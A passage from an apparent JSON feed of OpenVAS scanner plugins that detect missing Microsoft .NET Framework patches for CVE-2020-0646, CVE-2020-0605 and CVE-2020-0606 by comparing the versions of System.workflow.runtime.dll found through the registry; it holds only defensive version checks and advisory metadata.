Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535104\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n 
}\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && 
\"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532938", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815894", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815894\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532938\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532938\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n 
vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532935", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815895", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815895\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532935\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532935\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range 
= \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4535102", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310816552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816552", "type": "openvas", 
"title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816552\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535102\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source 
markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535102/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, 
item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n 
break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532936", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815897", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815897", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE 
Vulnerabilities (KB4532936)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815897\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532936\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework 
fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 Version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532936\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n 